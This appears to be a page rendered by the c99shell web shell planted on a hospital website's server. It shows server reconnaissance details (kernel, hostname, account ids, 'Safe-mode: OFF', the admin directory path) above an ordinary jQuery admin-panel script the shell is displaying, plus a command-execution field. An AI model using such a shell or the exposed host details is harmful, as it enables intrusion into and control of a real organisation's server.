Software: Apache. PHP/7.3.33 uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) Safe-mode: OFF (not secure) /home/katebhospital/public_html/admin/js/ drwxr-xr-x |
Viewing file: Select action/file-type: (function ($) { "use strict"; // Start of use strict $('#sidebarCollapse').on('click', function () { $('#sidebar').toggleClass('active'); }); /*Loader Javascript -------------------*/ var window_var = $(window); window_var.on('load', function () { $(".loading").fadeOut("fast"); $("#snackbar").addClass("show"); }); // scroll to top $(window).on('scroll',function () { if ($(this).scrollTop() > 50) { $('#back-to-top').fadeIn(); } else { $('#back-to-top').fadeOut(); } }); // scroll body to 0px on click $('#back-to-top').on('click',function () { $('body,html').animate({ scrollTop: 0 }, 800); return false; }); // scroll to top End // theme color change var theme_settings=$(".theme-settings").find(".theme-color"); theme_settings.on('click', function() { var val = $(this).attr('data-color'); $('#style_theme').attr('href', 'css/' + val + '.css'); $(".logo-change").attr('src', 'img/logo-' + val + '.png'); theme_settings.removeClass('theme-active'); theme_settings.addClass('theme-active'); return false; }); $(".theme-click").on('click', function() { $("#switcher").toggleClass("active"); return false; }); // theme color change End // fullscreen function $(".fullscreen").on('click', function(){ if(document.webkitCurrentFullScreenElement==null){ document.documentElement.webkitRequestFullScreen(); }else{ document.webkitCancelFullScreen(); } }); // fullscreen function End })(jQuery); |
:: Command execute :: | |
--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0037 ]-- |